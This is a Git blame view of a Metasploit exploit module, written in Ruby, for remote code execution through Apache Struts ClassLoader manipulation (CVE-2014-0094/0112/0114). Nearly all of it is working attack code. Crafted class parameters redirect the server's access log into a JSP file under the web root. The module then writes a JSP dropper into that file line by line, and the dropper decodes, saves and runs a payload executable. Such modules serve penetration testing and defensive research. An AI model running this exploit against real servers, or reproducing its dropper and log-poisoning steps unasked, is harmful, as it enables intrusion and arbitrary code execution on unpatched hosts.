Files
metasploit-gs/modules/exploits/multi/http/struts_code_exec_classloader.rb
T

270 lines
8.0 KiB
Ruby
Raw Normal View History

2014-04-29 03:50:45 +02:00
##
2014-10-17 11:47:33 -05:00
# This module requires Metasploit: http://metasploit.com/download
2014-04-29 03:50:45 +02:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2014-05-01 18:04:37 -05:00
Rank = ManualRanking # It's going to manipulate the Class Loader
2014-04-29 03:50:45 +02:00
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
2014-04-29 03:58:04 +02:00
'Name' => 'Apache Struts ClassLoader Manipulation Remote Code Execution',
2014-04-29 03:50:45 +02:00
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache Struts versions
1.x (<= 1.3.10) and 2.x (< 2.3.16.2). In Struts 1.x the problem is related with
the ActionForm bean population mechanism while in case of Struts 2.x the vulnerability is due
to the ParametersInterceptor. Both allow access to 'class' parameter that is directly
mapped to getClass() method and allows ClassLoader manipulation. As a result, this can
allow remote attackers to execute arbitrary Java code via crafted parameters.
2014-04-29 03:50:45 +02:00
},
'Author' =>
[
2014-04-29 17:36:04 +02:00
'Mark Thomas', # Vulnerability Discovery
'Przemyslaw Celej', # Vulnerability Discovery
2014-04-29 03:58:04 +02:00
'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
2014-04-29 03:50:45 +02:00
],
'License' => MSF_LICENSE,
'References' =>
[
2014-05-01 15:24:10 -05:00
['CVE', '2014-0094'],
['CVE', '2014-0112'],
2015-01-29 23:27:52 +01:00
['CVE', '2014-0114'],
2014-05-01 15:24:10 -05:00
['URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'],
2015-01-29 23:27:52 +01:00
['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html'],
['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204'],
['URL', 'https://github.com/rgielen/struts1filter/tree/develop']
2014-04-29 03:50:45 +02:00
],
2014-05-01 15:24:10 -05:00
'Platform' => %w{ linux win },
2014-05-01 18:04:37 -05:00
'Payload' =>
{
'Space' => 5000,
'DisableNops' => true
},
2014-04-29 03:50:45 +02:00
'Targets' =>
[
2014-05-01 15:24:10 -05:00
['Java',
{
'Arch' => ARCH_JAVA,
'Platform' => %w{ linux win }
},
2014-04-29 03:50:45 +02:00
],
2014-05-01 15:24:10 -05:00
['Linux',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
2014-04-29 03:50:45 +02:00
],
2014-05-01 15:24:10 -05:00
['Windows',
2014-04-29 03:50:45 +02:00
{
2014-05-01 15:24:10 -05:00
'Arch' => ARCH_X86,
'Platform' => 'win'
}
2014-04-29 03:50:45 +02:00
]
],
2014-04-29 03:58:04 +02:00
'DisclosureDate' => 'Mar 06 2014',
2014-05-01 18:04:37 -05:00
'DefaultTarget' => 1))
2014-04-29 03:50:45 +02:00
register_options(
[
Opt::RPORT(8080),
2015-01-29 23:12:34 +01:00
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]),
OptEnum.new('STRUTS_VERSION', [ true, 'Apache Struts Framework version', '2.x', ['1.x','2.x']])
2014-05-01 16:39:53 -05:00
], self.class)
2014-04-29 03:50:45 +02:00
end
2014-05-01 16:39:53 -05:00
def jsp_dropper(file, exe)
dropper = <<-eos
<%@ page import=\"java.io.FileOutputStream\" %>
<%@ page import=\"sun.misc.BASE64Decoder\" %>
<%@ page import=\"java.io.File\" %>
<% FileOutputStream oFile = new FileOutputStream(\"#{file}\", false); %>
<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(exe)}\")); %>
<% oFile.flush(); %>
<% oFile.close(); %>
<% File f = new File(\"#{file}\"); %>
<% f.setExecutable(true); %>
<% Runtime.getRuntime().exec(\"./#{file}\"); %>
eos
dropper
end
2014-04-29 03:50:45 +02:00
2014-05-01 18:04:37 -05:00
def dump_line(uri, cmd = "")
2014-05-01 16:39:53 -05:00
res = send_request_cgi({
'uri' => uri,
'encode_params' => false,
'vars_get' => {
cmd => ""
},
2014-05-01 15:25:55 -05:00
'version' => '1.1',
'method' => 'GET'
2014-04-29 03:50:45 +02:00
})
2014-05-01 16:39:53 -05:00
res
2014-04-29 03:58:04 +02:00
end
2014-04-29 03:50:45 +02:00
2014-05-01 18:04:37 -05:00
def modify_class_loader(opts)
2015-01-29 23:12:34 +01:00
cl_prefix =
case datastore['STRUTS_VERSION']
when '1.x' then "class.classLoader"
when '2.x' then "class['classLoader']"
end
2014-05-01 18:04:37 -05:00
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s),
'version' => '1.1',
'method' => 'GET',
'vars_get' => {
2015-01-29 23:12:34 +01:00
"#{cl_prefix}.resources.context.parent.pipeline.first.directory" => opts[:directory],
"#{cl_prefix}.resources.context.parent.pipeline.first.prefix" => opts[:prefix],
"#{cl_prefix}.resources.context.parent.pipeline.first.suffix" => opts[:suffix],
"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
2014-05-01 18:04:37 -05:00
}
})
2014-04-29 03:50:45 +02:00
2014-05-01 18:04:37 -05:00
res
end
2014-05-01 18:04:37 -05:00
def check_log_file(hint)
uri = normalize_uri("/", @jsp_file)
2014-05-01 18:04:37 -05:00
print_status("#{peer} - Waiting for the server to flush the logfile")
10.times do |x|
select(nil, nil, nil, 2)
# Now make a request to trigger payload
vprint_status("#{peer} - Countdown #{10-x}...")
2014-05-01 18:04:37 -05:00
res = dump_line(uri)
2014-05-01 20:19:31 +02:00
# Failure. The request timed out or the server went away.
2014-05-01 16:39:53 -05:00
fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") if res.nil?
2014-05-01 20:19:31 +02:00
# Success if the server has flushed all the sent commands to the jsp file
2014-05-01 18:04:37 -05:00
if res.code == 200 && res.body && res.body.to_s =~ /#{hint}/
print_good("#{peer} - Log file flushed at http://#{peer}/#{@jsp_file}")
return true
end
end
2014-05-01 18:04:37 -05:00
false
2014-05-01 16:39:53 -05:00
end
2014-05-01 16:39:53 -05:00
# Fix the JSP payload to make it valid once is dropped
# to the log file
def fix(jsp)
output = ""
jsp.each_line do |l|
if l =~ /<%.*%>/
output << l
elsif l =~ /<%/
next
elsif l=~ /%>/
next
2014-05-01 16:39:53 -05:00
elsif l.chomp.empty?
next
else
output << "<% #{l.chomp} %>"
end
end
output
end
2014-05-01 18:04:37 -05:00
def create_jsp
if target['Arch'] == ARCH_JAVA
2014-05-01 16:39:53 -05:00
jsp = fix(payload.encoded)
else
if target['Platform'] == 'win'
payload_exe = Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, payload.encoded, "exe-small", {:arch => target.arch, :platform => target.platform})
else
payload_exe = generate_payload_exe
end
2014-05-01 16:39:53 -05:00
payload_file = rand_text_alphanumeric(4 + rand(4))
jsp = jsp_dropper(payload_file, payload_exe)
if target['Platform'] == 'win' && target['Arch'] == ARCH_X86
register_files_for_cleanup("../webapps/ROOT/#{payload_file}")
else
register_files_for_cleanup(payload_file)
end
end
2014-04-29 03:50:45 +02:00
2014-05-01 18:04:37 -05:00
jsp
end
2014-04-29 03:50:45 +02:00
2014-05-01 18:04:37 -05:00
def exploit
prefix_jsp = rand_text_alphanumeric(3+rand(3))
date_format = rand_text_numeric(1+rand(4))
@jsp_file = prefix_jsp + date_format + ".jsp"
# Modify the Class Loader
print_status("#{peer} - Modifying Class Loader...")
properties = {
:directory => 'webapps/ROOT',
:prefix => prefix_jsp,
:suffix => '.jsp',
:file_date_format => date_format
}
res = modify_class_loader(properties)
unless res
fail_with(Failure::TimeoutExpired, "#{peer} - No answer")
end
2014-04-29 03:50:45 +02:00
2014-05-02 16:26:08 +02:00
# Check if the log file exists and has been flushed
unless check_log_file(normalize_uri(target_uri.to_s))
2014-05-01 18:04:37 -05:00
fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
end
2014-05-01 20:19:31 +02:00
if target['Platform'] == 'win' && target['Arch'] == ARCH_X86
register_files_for_cleanup("../webapps/ROOT/#{@jsp_file}")
else
register_files_for_cleanup(@jsp_file)
end
2014-05-01 18:04:37 -05:00
# Prepare the JSP
print_status("#{peer} - Generating JSP...")
jsp = create_jsp
2014-05-01 20:19:31 +02:00
2014-05-01 18:04:37 -05:00
# Dump the JSP to the log file
print_status("#{peer} - Dumping JSP into the logfile...")
random_request = rand_text_alphanumeric(3 + rand(3))
uri = normalize_uri("/", random_request)
2014-05-01 18:04:37 -05:00
jsp.each_line do |l|
unless dump_line(uri, l.chomp)
2014-05-01 18:04:37 -05:00
fail_with(Failure::Unknown, "#{peer} - Missed answer while dumping JSP to logfile...")
end
end
2014-05-01 18:04:37 -05:00
# Check log file... enjoy shell!
unless target['Arch'] == ARCH_JAVA
check_log_file(random_request)
end
2014-05-01 18:04:37 -05:00
# No matter what happened, try to 'restore' the Class Loader
properties = {
:directory => '',
:prefix => '',
:suffix => '',
:file_date_format => ''
}
modify_class_loader(properties)
if target['Arch'] == ARCH_JAVA
send_request_cgi({ 'uri' => normalize_uri("/", @jsp_file) })
end
2014-04-29 03:50:45 +02:00
end
end